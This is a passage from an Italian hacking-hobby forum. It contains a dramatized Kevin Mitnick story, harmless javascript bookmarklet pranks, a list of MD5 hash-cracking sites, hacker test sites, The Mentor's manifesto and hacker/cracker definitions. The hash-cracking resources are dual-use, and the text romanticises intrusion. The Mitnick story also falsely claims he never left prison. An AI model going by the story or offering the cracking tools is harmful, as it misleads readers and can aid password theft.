E Kevin gli spia le e-mail. Apprende i segreti più segreti della Digital, il suo intento era quello: se non posso ottenere le informazioni in un modo, le ottengo in un altro. L'FBI è sui suoi passi. Lui lo sa. Spia le comunicazioni tra la sede centrale dell'FBI e gli agenti dislocati, i quali lo stanno cercando per mezza America. Non appena l'FBI dà l'ordine “ok, andate a prenderlo”, lui sparisce. Li prende in giro. Falsifica le comunicazioni.E' un'ombra sulla Rete, nessuno sa dove sia fisicamente. Kevin nel frattempo è entrato ovunque: multinazionali, società d'informatica, agenzie governative. Entra e copia: progetti, piani,budget, business plan, contatti, consulenze esterne. Non vende nulla, non baratta, non cancella: apprende, impara, conosce. Per lui la conoscenza è importante.

Sa come funzionano le cose. Capisce che il nuovo business sta partendo: telecomunicazioni, telefonia cellulare, satellitare, pay-Tv. I bit avanzano, l'analogico scompare. Kevin lo sa. Forse inizia a capire il potere che ha in mano. Lo capiscono anche altre persone. Kevin ha accesso ad informazioni riservatissime, e questo dà molto fastidio alle multinazionali. Le lobby USA si muovono, l'FBI lo inserisce ufficialmente tra i “Top Wanted”, come per i peggiori criminali.

L'Fbi ha capito, le multinazionali anche, le lobby hanno provveduto: mancano i mass-media. Come per magia, appare un articolo sulla prima pagina del New York Times, il 4 luglio 1994: racconta dell'esistenza del Condor. Kevin diventa un personaggio. Ma è sempre più braccato. John Markoff, l'autore dell'articolo, fa di tutto per incontrarlo. Corrompe alcuni suoi “amici”, collabora con l'FBI per incastrarlo. 4. Inizia la guerra: Davide e Golia-Nel dicembre del 1994, appare un messaggio sul computer di Tsutomu Shimomura, nippo-americano, super esperto di sicurezza, consulente del Governo USA. Non c'è scritto molto, solo un “Found me: I am on the Net”. Trovami, sono sulla Rete, gli dice Kevin. La sfida ha inizio. Per la prima volta, le armi sono diverse: è una caccia all'uomo on-line. Le maggiori compagnie di telecomunicazione americane collaborano con l'FBI. La Sprint Corporation fornisce manuali, schede, tecnici specializzati. Il Condorè braccato. Kevin ha utilizzato, tra i primi al mondo, la tecnica dell'IP-spoofing, nel dicembre del 1994, per attaccare i server di Shimomura con sede a San Diego. Shimomura commenta questa tecnica ad una conferenza americana (CMAD), nel gennaio del 1995. Pare dunque che inizi, sin da subito, lo sfruttamento del Condor, delle sue tecniche, della sua abilità, del suo stile stile e delle sue competenze. Markoff scrive altri articoli, accusa Kevin, lo dipinge come il “criminale”. Kevin ama, come molti hacker, la stampa.

Vuole dire la sua.Non accetta giudizi senza poter ribattere. Contatta Jonathan Littman. Arriva a chiamarlo tre volte al giorno. Forse, da questo momento in poi, il Condor perde la sua freddezza, la sua lucidità, i suoi attenti calcoli. Compie degli errori. Deve cambiare città sempre più spesso. Non capisce le motivazioni di tanto clamore attorno al suo caso. Discute con il giornalista “buono” di hacking, di politica, di tecnologia, di donne, di costume. Littman lo definirà “una mente esplosiva, incontrollabile, incredibilmente potente”.Littman sbaglia: come in ogni “grande rovina”, all'origine c'è un errore. Parla con Markoff, si confida.

Gli rivela dove si trova Kevin. Lo rivela al collega giornalista, all'amico John. Markoff, il quale informa immediatamente Shimomura. Il cerchio si stringe. Kevin crede di essere tranquillo. Ha fiducia nel suo confidente. Una volta un hacker mi disse: “Trust no 1: non fidarti mai di nessuno”. Kevin avrebbe dovuto incontrare quell'hacker, forse sarebbe andata diversamente. John Markoff o Shimomura – ma è indifferente – informano l'FBI.Il Condor sta per cadere. Torniamo al 14 febbraio del 1995. Kevin viene arrestato. Non uscirà mai più dal carcere.


http://pclab.forumcommunity.net/?t=11396388
view post Posted: 4/3/2011, 20:50     Javascript - Hacking e computer
Provate ad immettere questi due codici nella barra degli indirizzi, cancellando tutto cio' che c'è scritto e incollando il testo, poi premete invio, fingendovi grandi hacker in defacing, provateli, ovviamente dopo una pressione di F5 tutto ritornerà normale
CODICE
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName( "img" ); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+ "px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+" px"}R++}setInterval('A()',5); void(0);



CODICE
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
view post Posted: 4/3/2011, 20:06     MD5 - Definizioni
Come spero sappiate le password dai siti internet vengono codificate in MD5, un complicatissimo codice a 128 bit avere i giusti siti sottomano è una furba cosa per difendersi:

Milw0rm(www.milw0rm.com/cracker/insert.php)
md5()(http://md5.rednoize.com/)
PassCracking(http://passcracking.com/index.php)
Audero.it (http://www.audero.it/md5.php?stringtomd5=2...submit=Converti)
Ed ecco un programmino utile per farlo offline: www.megaupload.com/?d=GQWMF3IC


Ora vi propongo un gioco, prendete le vostre vecchie password e convertitele poi aprite un' altra scheda e nella barra URL inseritela, se ci sono dei risultati, vuole dire che siete in pericolo e vi consiglio VIVAMENTE di cambiarla. Postate qui i vostri risultati
SPOILER (click to view)
COME SEMPRE IO NON MI ASSUMO ALCUNA RESPONSABILITA' DI QUELLO CHE FARETE, INFATTI QUESTA GUIDA E' SOLO A SCOPO INFORMATIVO


Edited by (!_!) - 26/4/2011, 09:44
view post Posted: 4/3/2011, 14:46     Tutte le versioni di Win e tutte le versioni di IE testate in un video - News dal mondo informatico
In questo video vengono provate tutte le versioni di Window o quasi, lascio a voi scoprire quale


http://rasteri.blogspot.com/2011/03/chain-...ough-every.html

Edited by (!_!) - 21/3/2011, 18:37
view post Posted: 3/3/2011, 20:41     Test HACKER - Hacking e computer
Eco una serie di test di hacking, per scoprire quanto siete bravi:

www.hackergame.it/

www.nienteansia.it/test/trova-la-password/

www.hackertest.net/

www.hack-test.com/



La lista verrà presto aggiornata se avete consigli postate pure










view post Posted: 3/3/2011, 20:34     +1Lezioni hacker - News dal mondo informatico

12 lezioni per diventare un hacker



Poter avere la libertà di oltrepassare le limitazioni imposte dall’alto è sempre stata un’ambizione di molte persone. Per definizione, l’hacker è colui che grazie alla sua accurata conoscenza dell’informatica, riesce a entrare nei sistemi senza conoscere gli accessi, a utilizzare software con protezione, a leggere documenti riservati.

La "Hacker Highschool" è un programma di 12 lezioni in pdf che spiega come diventare un vero e proprio hacker. Sono elencati i metodi e le tecnologie da utilizzare. Le lezioni sono così suddivise:

Lezione 01 – Essere un hacker 26-01-05
Lezione 02 – Windows e Linux 26-01-05
Lezione 03 – Porte e Protocolli 26-01-05
Lezione 04 – Servizi e Connessioni 26-01-05
Lezione 05 – Identicazione del Sistema 26-01-05
Lezione 06 – Malware (Virus, Trojan, etc.) 26-01-05
Lezione 07 – Analisi di un attacco 26-01-05
Lezione 08 – Digital Forensics "casalinga" 26-01-05
Lezione 09 – Sicurezza nell’E-mail e Privacy 27-01-05
Lezione 10 – Sicurezza Web e Privacy 24-07-06
Lezione 11 – Le Password 27-01-05
Lezione 12 – Internet: Legislazione ed Etica 31-07-06

[Fonte Pokehacking]
view post Posted: 3/3/2011, 20:26     MANIFESTO HACKER - News dal mondo informatico
Ecco il manifesto hacker, scritto da un hacker soprannominato THE MENTOR

Manifesto Hacker
Ho letto i vostri giornali. Anche oggi avete pubblicato la solita notizia. "Ragazzo arrestato per crimine informatico"
"Hacker arrestato dopo essersi infiltrato in una banca" E infine oggi in cronaca:

"Pirata informatico sfugge alla cattura." Dannati ragazzini. Sono tutti uguali. Ma voi, con la vostra psicologia da due soldi e il vostro tecno- cervello da anni 50, avete mai guardato dietro agli occhi di un Hacker? Non vi siete mai chiesti cosa abbia fatto nascere la sua passione?
Quale forza lo abbia creato, cosa può averlo forgiato? Io sono un Hacker, entrate nel mio mondo, se potete.

Il mio è un mondo che inizia con la scuola... Sono più sveglio di molti altri ragazzi, quello che ci insegnano mi annoia. Come quando leggi un romanzo a puntate, e ogni volta arrivi alla fine della puntata e capisci che neanche lì ti è stato detto quello che volevi sapere, e dovrai aspettare ancora chissà quanto prima della prossima lezione.

Dannato bambino. Non vuole andare a scuola. Sono tutti uguali.

Credo di essere alle medie. So che ho ascoltato l'insegnante spiegare per quindici volte come ridurre una frazione. L'ho capito, maledizione. La brutta ? Quale brutta ? Per una stupidaggine del genere ? No, professoressa Lazzarini, non ho la brutta. L'ho fatto a mente.

Dannato ragazzino. Probabilmente lo ha copiato. Sono tutti uguali.

Ma oggi ho fatto una scoperta. Tornato a casa, sul mio tavolo, ho trovato un computer. Me l'ha comprato il mio babbo. Grande babbo! Lui mi aspetta a casa e mi spiega un mucchio di cose, sempre. Mi legge brani dell' enciclopedia, mi mostra illustrazioni dei libri di scienze. E sorride quando la gente pensa che stia sprecando fiato, che io non lo ascolti o non lo capisca. Possiamo stare insieme solo poche ore, tu torni alle 5, io alle 9 sono a letto. Ma aspetto questo momento con gioia.

E oggi mi hai portato un computer. Aspetta un momento, questo è incredibile! Fa esattamente quello che voglio. Se commetto un errore, è perchè io ho sbagliato, non perchè io non gli piaccio... O perchè si senta minacciato da me... O perchè pensa che io sia un coglione... O perchè non gli piace insegnare e vorrebbe essere da un'altra parte...

Dannato bambino. Tutto quello che fa è giocare. Sono tutti uguali.

Ma tu no, vero ? Tu non me lo dicevi mai. Forse perchè le cose che sapevi (sapevi tutto; come diavolo facevi ?) non le avevi studiate a scuola, ma le avevi imparate da solo. Anche tu giocavi con le cose. Giocavi assieme a me, e mi insegnavi. Non avevi mai studiato il latino, ma sapevi perfettamente cosa vuol dire "ludendo docere", vero ? E poi un giorno non ti vidi più. Mia madre scomparve dalla mia vita, offuscata dal dolore. Cercavamo di sostenerci a vicenda, e per farlo ci allontanavamo. Rimasi solo. Solo, in un mondo dove tutti i ragazzini sono uguali. Dannati ragazzini.

Poi successe una cosa... una porta si aprì per la mia mente... correndo attraverso le linee telefoniche, un impulso elettronico viaggiò attraverso una realtà parallela, una nuova frontiera inesplorata, un rifugio dagli incompetenti di ogni giorno. Una tastiera e un accoppiatore acustico come il carro che trasportava il pioniere. Una tastiera e un accoppiatore acustico per rinascere a una vita nuova nel mondo digitale. Morì il signor S.S., nacque Raistlin.

"Questo è...questo è il luogo a cui appartengo..." Io conosco tutti qui...non ci siamo mai incontrati, non abbiamo mai parlato faccia a faccia, non ho mai ascoltato le loro voci...però conosco tutti. Capisco tutti. Parlate un linguaggio che mi è noto. Provate un sentimento che mi è noto. Amici, fratelli, compagni.

Dannato studentello. Si è allacciato nuovamente alla linea telefonica. Sono tutti uguali.

Sapete una cosa? Ci potete scommettere il c**o che siamo tutti uguali! A scuola ci avete nutriti con cibo da bambini mentre avremmo desiderato una bistecca, ci avete dato pezzi di cibo già masticati e privi di sapore, invece di insegnarci quello che ci serviva per procurarcene di nuovi. Siamo stati di volta in volta ammansiti da sdolcinati, dominati da sadici o ignorati dagli indifferenti. I pochi che avevano qualcosa da insegnarci trovavano in noi volenterosi allievi, ma queste persone sono come gocce d'acqua nel deserto. Dove sei scomparso, babbo? Perchè?

Dannato ragazzino. Sempre a trafficare con quella trappola, e a consumare scatti. Sono tutti uguali. Guarda che bolletta.

Adesso questo è il nostro mondo... il mondo dell'elettrone e dello switch, la bellezza del baud. Noi eravamo pronti ad esso, ed è inutile che proviate a confonderci e chiamarlo vostro, ad appropriarvene, a ingozzarvi di cose che vi saranno indigeste. Guardatevi, usate il web come uno spot televisivo, per vendere mortadelle. Siete ridicoli. Noi siamo nati nel cibermondo, siamo suoi fratelli di sangue, abbiamo giurato i suoi patti, respirato i suoi ritmi, abbiamo succhiato i suoi impulsi al posto del latte che non ci avete dato, compreso le sue arti in luogo di quelle che non ci avete spiegato, appreso la sua morale in luogo di quella che ci avete insegnato a parole, infrangendola quando vi faceva comodo, con la scusa che noi siamo ragazzini, tutti uguali, non sappiamo come funziona il mondo.

E ora noi sappiamo vivere in esso, ci è più intimo di un fratello, mnoi vediamo le sue vere potenzialità. Se fosse per noi (se fosse per lui, anche: ha una sua personalità, un organismo quasi vivente, palpitante) esso non costerebbe nulla; ma purtroppo è alimentato solo da approfittatori ingordi. Ed è solo perchè ci rifiutiamo di assecondare la vostra smania di assimilarlo nella vostra mentalità capace soltanto di fare soldi da qualsiasi cosa (ringrazio tutte le divinità per avervi impedito di trovare un modo di fare soldi anche sull'aria, che nonostante tutto e con disgusto debbo continuare a condividere con voi) che voi ci chiamate criminali ?

Noi esploriamo...e ci chiamate criminali. Nel kernel di fortezze di silicio cerchiamo la verità che vorreste negarci, e ci chiamate criminali. Noi esistiamo, senza colore di pelle, nazionalità, credi religiosi, e ci chiamate criminali. Noi non ci tradiamo l'un l'altro (cosa che voi non credo potreste mai capire), e ci chiamate complici, rete di criminali. Ma sopratutto, noi cerchiamo conoscenza... ed è per questo, diciamoci la verità, che ci chiamate criminali. Vi dirò una cosa che vi spaventerà: non è la prima volta che mi succede. E so già che la vostra è una battaglia destinata alla sconfitta. Chi comprende il nemico, chi governa il suo cuore, vincerà cento battaglie senza subire sconfitta. Sun-Tzu,
"Ping-Fa", duemilaseicento anni fa. Noi abbiamo compreso il vostro nulla. Voi non potete nemmeno capire quello che proviamo.

Guardatevi. Avete paura di noi. Mobilitate risorse enormi per prenderci. Come re Dario a Gaugamela, trecentomila uomini, carri falcati, elefanti, contro i cinquantamila macedoni di Alessandro. Ma noi scommettiamo, come lui, sul fatto che più difese ammassate, meno le comprendete, meno siete in grado di usarle. Capiamo che, se cercate di fermarci con tutti i mezzi, vi stiamo facendo paura, e proprio per questo abbiamo già vinto il nostro duello con voi. Noi siamo come i ninja di Koga, come fantasmi che passano attraverso i muri che costruite. Ombre che si muovono nel ciberspazio, ignorando i regolamenti assurdi che vorreste dettare.

Costruite pure bombe atomiche, poi smantellatele e infilateci i rimasugli nei denti; finanziate pure le vostre immonde guerre, dipingendo le insegne dell'ONU sotto le bombe. Uccidete, ingannate e mentite, come fate da sempre, come fate sempre meglio, e cercate di farci credere che lo fate per il nostro bene; e cercate di convincerci che ammazzare sempre meglio è il progresso. Così arriviamo al paradosso che un uomo delle caverne se ammazzava un suo simile, si riteneva un assassino; la Nestlè uccide ogni anno qualche milione di bambini sudafricani con le sue polverine biancastre di origine ignota, e si ritiene una moderna multinazionale. Voi tenete il dito sul pulsante che potrebbe cancellare mille volte la terra, e vi ritenete saggi. E in tutto questo, ovviamente, i criminali da perseguire siamo noi.

Vi dirò una cosa, un messaggio antico, che vi recapito sfruttando questa tecnologia che conosco meglio di voi che la controllate (ma potete davvero controllarla ? Siete sicuri di possedere la saggezza antica che vi serve per farlo ?). Noi crediamo fermamente, come una fede, che la verità non possa essere oggetto di restrizioni legali. Se mettete fuorilegge la verità, allora saranno i fuorilegge ad avere la verità. E noi, infatti, siamo criminali. Ma il giorno in cui qualcuno di voi deciderà di tagliar fuori la gente dalle informazioni, indovina un po' chi sarà a combattere la battaglia per rendergliele? E indovina un po' chi vincerà quella battaglia? Intendiamoci, io non sono un eroe, e non ci tengo ad esserlo.

Eroe è chi incarna gli ideali della società. Ma finchè l'ideale sarà quello dell'ignoranza, dell'apparire contrapposto al sapere, io seguirò l'anti-ideale. Io resterò un antieroe, sono e resto soltanto un criminale. Il mio crimine è la mia curiosità. Il mio crimine è desiderare di sapere quello che voi non vorreste dire, desiderare di sapere tutto ciò che la mia natura di essere umano mi dà il pieno "e inalienabile diritto di conoscere". Lo avete scritto voi, una cinquantina di anni fa. Ma ve ne siete dimenticati, vero? Però non vi dimenticate di perseguire il mio crimine.

Vi racconterò una storia: la moglie dell'arcivescovo di Worcester, dopo aver ascoltato Darwin enunciare le sue teorie, esclamò "L'uomo discende dalla scimmia? Mio Dio! Speriamo che non sia vero... o per lo meno, che non si sappia in giro". Diciamo che la voce è circolata. Appena appena.Sappiate che di quello che state facendo, nulla resterà nascosto. La verità sarà sempre rivelata.

Questo è, e sarà, il mio compito, il nostro compito, negli anni a venire.

Questo è stato il mio compito, in lunghi secoli passati. Io sono mortale, ma la lotta per la verità è eterna. Io sono la sua incarnazione qui, e oggi. Io sono un Hacker, e questo è il mio manifesto. Potete anche fermare me (potete provarci, almeno), ma non potete fermarci tutti... dopo tutto, siamo tutti uguali, no?

Voi cosa ne pensate?
view post Posted: 3/3/2011, 20:25     SFIDA - Hacking e computer
Vi propongo una sfida, cercate di creare una cartella chiamata "con", e vedete cosa succede.
Io ce l'ho fatta. Vediamo voi!


POSTATE I VOSTRI RISULTATI
Non visualizzatelo
SPOILER (click to view)
Non si puo' perchè con è il nome di un comando del prompt, perciò bisognera aggiungergli un carattere invisibile, quindi :
1 aprire il cmd
2 scrivere MD con\
3- il gioco è fatto :P

view post Posted: 3/3/2011, 20:21     Definizioni - Definizioni
HACKER

Un hacker è una persona che si impegna nell'affrontare sfide intellettuali per aggirare o superare creativamente le limitazioni che le vengono imposte, in primo luogo nei suoi ambienti di interesse, che solitamente comprendono l'informatica o l'ingegneria elettronica.

Esiste peraltro un luogo comune, utilizzato soprattutto dai media, per cui il termine hacker viene associato ai criminali informatici (la cui corretta definizione è cracker).

CRACKER

In ambito informatico il termine inglese cracker indica colui che entra abusivamente in sistemi altrui allo scopo di danneggiarli, lasciare un segno del proprio passaggio, utilizzarli come teste di ponte per altri attacchi oppure per sfruttare la loro capacità di calcolo o l'ampiezza di banda di rete.

I cracker possono essere spinti da varie motivazioni, dal guadagno economico (tipicamente coinvolti in operazioni di spionaggio industriale o in frodi) all'approvazione all'interno di un gruppo di cracker (come tipicamente avviene agli script kiddie, che praticano le operazioni di cui sopra senza una piena consapevolezza né delle tecniche né delle conseguenze).

I media hanno l'abitudine di definire hacker i cracker, mentre, sebbene alcune tecniche siano simili, i primi hanno scopi più costruttivi che distruttivi, come accade invece ai secondi.

LAMER

Un lamer è un aspirante cracker con conoscenze informatiche limitate. Il termine inglese, in genere dispregiativo, si può tradurre come stupidotto.
Solitamente i lamer sono per lo più dei ragazzini che, a puro scopo di vandalismo, mandano dei trojan (virus) ad altri utenti al fine di entrare nei loro computer, per poi eventualmente danneggiare o distruggere le informazioni contenute all'interno del PC attaccato.
I lamer vengono disprezzati dagli hackers perché sono ritenuti in parte responsabili della connotazione negativa del termine hacker, che viene tutt'oggi associato alla criminalità informatica, alla diffusione di malware ecc.
Il lamer si differenzia dall'hacker perchè il suo scopo non è esplorare e migliorare, ma fare vandalismo.

PHREACKER

Eseguire chiamate telefoniche riuscendo a non pagarle, precursore dell'hacking.
Un phreaker è una persona che si inserisce in un network telefonico tipicamente per poter effettuare telefonate gratuite ma anche semplicemente per poter origliare. Il termine è anche usato per indicare persone che penetrano o tentano di penetrare i sistemi di sicurezza di un qualunque network.

Fonte:HackZero


Edited by (!_!) - 26/4/2011, 09:18
view post Posted: 27/2/2011, 19:38     Il blog della NASA - Off Topic
Bisogna essere proxati per visitarlo?
2744 replies since 12/2/2011